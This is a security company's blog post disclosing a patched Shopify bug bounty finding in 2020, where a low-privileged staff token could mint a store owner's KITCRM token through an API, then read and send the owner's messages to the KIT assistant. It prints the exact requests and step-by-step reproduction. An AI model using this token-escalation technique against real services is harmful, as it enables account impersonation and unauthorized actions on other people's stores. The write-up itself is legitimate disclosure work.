Security

Shopify Bug Bounty: Exploiting Access Controls in Shopify Ping and KITCRM

Sandeep
Founder
A black and white photo of a calendar.
Updated:
January 24, 2025
A black and white photo of a clock.
12
mins read
On this page
Share

Overview

In this blog post, I’ll be walking you through a access control vulnerability I identified in Shopify’s Ping and KITCRM applications. This flaw allowed a low-privileged user to escalate their privileges and impersonate high-privileged users to access and control sensitive conversations with KIT. The impact? Unauthorized access to high-privileged users' communications and the ability to execute tasks on their behalf, making this vulnerability a significant security risk.

What Are Shopify Ping and KIT?

Shopify Ping is a communication tool designed for Shopify users to engage with customers and manage their businesses. One of its integrations is with KIT, a virtual assistant application that can handle tasks like creating discount codes, launching retargeting campaigns, sending thank-you emails, and more.

High-privileged users, like store owners or admins, typically have access to these tools. Low-privileged users, such as staff members with limited permissions, are generally restricted from accessing Shopify Ping and KIT functionalities. However, this vulnerability bypassed these restrictions entirely.

The Bug: Privilege Escalation via KITCRM

The core issue lies in the API endpoints of KITCRM, where a low-privileged user could generate a high-privileged user's KITCRM authorization token using their own Shopify Ping access token. This allowed the low-privileged user to impersonate high-privileged users and access sensitive features and data.

Vulnerable Requests

Vulnerable Request 1: Generate High-Privileged User’s KITCRM Authorization Token

POST /api/v1/arro_token?access_token=LOW_PRIVILEGED_USER_TOKEN&myshopify_domain=yourstore.myshopify.com&id=HIGH_PRIVILEGED_USER_ID HTTP/1.1
Host: www.kitcrm.com
Content-Type: application/json
Connection: close

By providing a valid Shopify Ping access token (from a low-privileged user) and the high-privileged user's staff ID in the id parameter, the response disclosed the high-privileged user's KITCRM authorization token.

Response:

{
  "token": "HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN"
}

Using this token, the attacker could perform unauthorized actions as a high-privileged user.

Vulnerable Request 2: View High-Privileged User’s Conversations

GET /api/v2/messages HTTP/1.1
Host: www.kitcrm.com
Authorization: Bearer HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN
Accept: application/json


This request displayed sensitive communications between the high-privileged user and KIT.

Vulnerable Request 3: Send Messages to KIT

POST /api/v2/messages HTTP/1.1
Host: www.kitcrm.com
Authorization: Bearer HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN
Content-Type: application/json

{
  "incoming_message": "testtesthai"
}

Using this request, the attacker could send instructions to KIT on behalf of the high-privileged user.

Steps to Reproduce

1. Login as High-Privileged User: Log in to the Shopify Ping application with high-privileged credentials and communicate with KIT.

2. Create a Low-Privileged User: Add a low-privileged user to the Shopify store with no or minimal permissions.

3. Obtain Low-Privileged User’s Access Token: Use the Shopify Ping login API to generate the access token for the low-privileged user.

POST /admin/api/xauth HTTP/1.1

4. Exploit the Vulnerability: Use the low-privileged user’s access token in Vulnerable Request 1 with the high-privileged user’s staff ID. Replay the request using a tool like Burp Suite to obtain the high-privileged user’s KITCRM authorization token.

5. Access Sensitive Conversations: Use the high-privileged user’s token in Vulnerable Request 2 to read communications.

6. Send Instructions to KIT: Leverage Vulnerable Request 3 to send commands on behalf of the high-privileged user.

Impact

This vulnerability had severe implications:

  • Unauthorized Access: A low-privileged user could access high-privileged users' communications with KIT.
  • Task Manipulation: Attackers could execute tasks on behalf of the high-privileged user, such as creating discount codes, launching campaigns, or sending emails.
  • Lack of Auditability: Since all actions were performed under the high-privileged user’s account, tracking the attacker would be challenging.

Recommendations and Fixes

Shopify resolved this issue by implementing:

  1. Strict Access Control: Ensuring that low-privileged users cannot access Shopify Ping APIs.
  2. Token Binding: Linking KITCRM authorization tokens to specific user roles to prevent misuse.

Conclusion

This vulnerability highlights the importance of robust access control mechanisms in applications handling sensitive user data and permissions. By exploiting improper validation in API endpoints, a low-privileged user could compromise the integrity of high-privileged users’ actions.

I’m grateful to Shopify for acknowledging and patching this vulnerability promptly as part of their bug bounty program. This experience reinforces the critical role of security researchers in safeguarding platforms and their users.

Original Report: https://hackerone.com/reports/909863

Timeline

  • Report Submission: June 27, 2020,
  • Acknowledgment: July 2, 2020
  • Fix Deployed: August 24, 2020
  • Bounty Awarded: 1000 USD on July 6, 2020

Shoutout to Shopify

A huge thanks to Shopify for their well-organized bug bounty program and commitment to user security. If you’re a security researcher, I highly recommend participating in their program!

Sandeep

Founder & CEO @ Appsecure Security

Loved & trusted by Security Conscious Companies across the world.
Let’s Talk

Other Blogs

Security
Why Enterprises Need Red Teaming: A CISO’s Guide to Enhancing Security Resilience
Read More
Security
What is vulnerability assessment and penetration testing (VAPT) ? Know everything about it
Read More
Security
Five Security Measures to Protect Your Company From Getting HACKED
Read More
Security
How Default Credentials Lead to Cyberattacks & Best Practices to Prevent Them
Read More
Security
Selecting the Right VAPT Provider: A Guide for CISOs & Security Teams
Read More
Security
Meta Bug Bounty: Unauthorized access to any Meta user’s draft profile picture frames
Read More
Security
Security Checklist for Web Developers – OWASP Top 10 Explained
Read More
Security
Privilege Escalation Vulnerability in Yelp Business Platform – A Security Analysis
Read More
Security
Reddit Bug Bounty: Exploiting an IDOR Vulnerability in Dubsmash’s UpdateSound API
Read More
Security
The Psychology of Red Teaming: Thinking Like an Attacker
Read More
Security
Red Teaming vs Pentesting
Read More
Security
PGP Encryption
Read More
Security
Why do we need Cybersecurity Awareness Month?
Read More
Security
Everything you need to know about 2-Factor Authentication.
Read More
Security
IDOR Mitigation Strategies for Building Secure Web Applications
Read More
Security
Overview of Dependency Confusion Attacks
Read More
Security
Exploiting File Upload Vulnerabilities: Prevention Strategies
Read More
Security
Secure Your Auth0 Authentication: Deep Dive into Auth0 Best Security Practices
Read More
Security
Securing Your Application with Firewall: A Comprehensive Guide to Using Cloudflare WAF
Read More
Stats

The Most Trusted Name In Security

300+
Companies Secured
7.5M $
Bounties Saved
4800+
Applications Secured
168K+
Bugs Identified
Accreditations We Have Earned

Protect Your Business with Hacker-Focused Approach.

Secure Now
Schedule A Call